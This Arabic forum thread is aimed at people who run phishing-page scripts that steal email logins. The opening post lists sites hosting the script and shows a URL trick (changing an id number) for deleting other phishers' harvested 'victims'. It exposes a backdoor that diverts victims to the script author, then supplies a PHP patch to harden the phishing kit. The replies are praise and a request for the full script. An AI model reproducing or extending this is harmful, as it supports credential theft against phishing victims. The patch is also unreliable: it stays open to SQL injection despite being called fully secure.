ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

تم تحميل الصفحة في 0,6051479 ثانية
ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً
إنضم
13 سبتمبر 2010
المشاركات
532
الإعجابات
90
النقاط
0
السلام عليكم ورحمة الله وبركاته
اعذروني شباب والله ماعرفت وين احط الموضوع
قلت هذا القسم مناسب لانه يختص بالايميلات (أما اذا كنت غلطان فاكيد المشرفين راح يلاقو القسم المناسب له :10: )
والمواقع الي انا اتكلم عنها تختص كمان بالايميلات وصفحاتها المزورة
المهم ما اطول عليكم
الكثير الكثير مركبين السكربت هذا على مساحات مجانية وعلى مساحات مدفوعة
المهم ومنها المواقع التالية

http://ici-bilal.tk/
http://skizoo.oc.gs/
http://ar-point.com/index.php
http://www.startimes.0fees.net/
http://crazynames.byethost2.com/
جربت اسجل في احد المواقع المنزلة احد الاخوة
ووجدت ثغرة
تتيح لي ان احذف ضحايا غيري حتى لو لم اكن مسجل في الموقع
جربت اسجل بموقع اخر كمان الثغرة عند الجميع
طبعاً نزلت السكربت وتاكدت من قاعدة البيانات هل يتم الحذف ام لا والمفاجئة الكبرى
انه ليس فقط فيه الثغرة
كمان صانع السكربت عامل له باب خلفي
يعني لما تقوم بحذف ضحيتك في الاساس ضحيتك ماتنحذف في الاساس اذا لم يكن اليوزر ايدي تبعك 2 فانه يحول الضحية الى صاحب هذا اليوزر ايدي
المهم في السكربت هو حذف الضحايا
انا قريت الاسكربت
ووجدت الثغرة ورقعتها
وان شاء الله الكل يستفاد
بالاول
الثغرة هي
كود:
http://yoursite.com/index.php?do=victims&type=delet_victim&id=513
شايفين الرقم 513
هذا رقم الضحية
جرب غيرة اي رقم لضحية مايكون موجود عندك
راح تشاهدة يحذف الضحايا
يعني لو حدى عمل برنامج يعمل لرابط السابق لو مع مضاعفة قيمة المتغير id
اكيد راح يحذف جميع الضحايا التي في الموقع خلال دقيقة او دقيقتين

المهم انا رقعت الثغرة
وشرح الترقيع كتالي

ادخل على مجلدات الموقع
وادخل على مجلد inc_files
افتح الملف الذي باسم victims.php
اذهب الى السطر
86
احذف الكود التالي
كود:
if(user_id == 2){
        $cod_sql = "DELETE FROM victims WHERE victime_id = '$id'";
    }else{
        $cod_sql = "UPDATE victims SET victime_user_id = '2' WHERE victime_id = '$id'";
    }
    $sql_select_scama_id = @mysql_query($cod_sql) or die (error_sql(mysql_error(),__LINE__,__FILE__));
    echo '<TR>
        <TD class="f1m" align=right width="529" height="44" colspan="7"><font size="2" face="Tahoma" color="green">
        تم حدف الضحية بنجاح</font></TD>
      </TR>';
      redirect();
وضع بدالة الكود التالي

كود:
admiral($user_name,$user_password,$id);
الان اذهب الى الملف

function.php

افتحه ومن بعد السطر هذا
كود:
<?
الصق الكود التالي

كود:
function admiral($user_name,$user_password,$id)
{
$sql="
SELECT * FROM victims WHERE victime_id='$id' AND victime_user_id in (SELECT user_id FROM users WHERE user_name='$user_name' and user_password='$user_password')";
$result=mysql_query($sql);
$count=mysql_num_rows($result);
if($count==1){
$cod_sql = mysql_query("DELETE FROM victims WHERE victime_id = '$id'");
if($cod_sql)
{    echo '<TR>
        <TD class="f1m" align=right width="529" height="44" colspan="7"><font size="2" face="Tahoma" color="green">
        تم حدف الضحية بنجاح</font></TD>
      </TR>';
      redirect();
      }
      else
      {
    echo '<TR>
        <TD class="f1m" align=right width="529" height="44" colspan="7"><font size="2" face="Tahoma" color="green">
        حدث خطاء اثناء الحذف</font></TD>
      </TR>';
      redirect();      
      }
}
else
{
echo '<TR>
        <TD class="f1m" align=right width="529" height="44" colspan="7"><font size="2" face="Tahoma" color="green">
        وين رايح يابو الشباب انت تحاول حذف ضحايا غيرك</font></TD>
      </TR>';
}
}
وبهذا مبروك عليك :6::6: السكربت امن تماماً

ان شاء الله الجميع يسد الثغرة
ولمن اراد الملفات بعد الترقيع
هذا رابط الملفين victims.php و function.php
http://www.mediafire.com/?al4k6w18h07bi3f
تم الترقيم من قبل ::أميرال النوفل

وفي الاخير تقييمكم :24::24::24: وامانه عليكم اثناء النقل ان يتم ذكر الحقوق

أخوكم في الله أميرال النوفل
 

spymail

Beginner Developer
rankrankrank
إنضم
14 مارس 2011
المشاركات
529
الإعجابات
25
النقاط
0
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

شكر شكر شكر . انا اسف و الله بدي تكلمن على الايميل ضاروري

يا اخي و الله​
 
إنضم
24 أغسطس 2010
المشاركات
2,121
الإعجابات
95
النقاط
0
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

يعطيك الف عافيه اخوي

:13::13:
 
إنضم
13 سبتمبر 2010
المشاركات
532
الإعجابات
90
النقاط
0
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

هلا فيكم شبابك منورين يالغالين
 
إنضم
13 سبتمبر 2010
المشاركات
532
الإعجابات
90
النقاط
0
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

منور اخي الغالي
 
إنضم
11 مارس 2011
المشاركات
42
الإعجابات
3
النقاط
0
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

يآ آخي من يوم يومك معـلم وآحلآ تقييم يآ كبدي آنـت ..:32:

موآح ع آلبـك ..​
 
إنضم
19 أغسطس 2010
المشاركات
2,108
الإعجابات
440
النقاط
83
العمر
30
الإقامة
MoroCCأ´
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

:32:

:32::32::32::32::32::32:

:32:
 

RB3

Beginner Developer
rank
إنضم
19 أغسطس 2010
المشاركات
134
الإعجابات
10
النقاط
0
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

مبدع :10:
تقبل مروري :32:
 
إنضم
10 نوفمبر 2009
المشاركات
8,817
الإعجابات
2,391
النقاط
0
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

:9::9::9::9::9::9::9::9:
 
إنضم
4 يوليو 2009
المشاركات
1,400
الإعجابات
242
النقاط
63
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

تكرم يالغالي على التنبيه :)

وفي انتظار السكريبت الخاص بك اخوي اميرال :13:

جاري تقييمك :9:
 

رســول الفـنـون

اللهم صل وسلم على نبينا محمد .
إنضم
10 مارس 2011
المشاركات
6,404
الإعجابات
2,204
النقاط
113
الإقامة
Jazan
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

يعطيك العافية وجزاك الله خير
 
إنضم
10 مارس 2011
المشاركات
2,996
الإعجابات
311
النقاط
83
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

بطلٌ

وآصلٌ
:$
 
إنضم
10 مارس 2011
المشاركات
1,117
الإعجابات
109
النقاط
63
رد: ثغرة بمواقع الصفحات المزورة للايميلات والمواقع خطيرة جداً

السلام عليكم
أخي تم تقييمك
ياريت تضع لنا السكريبت كامل
مع طريقة تركيبه
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل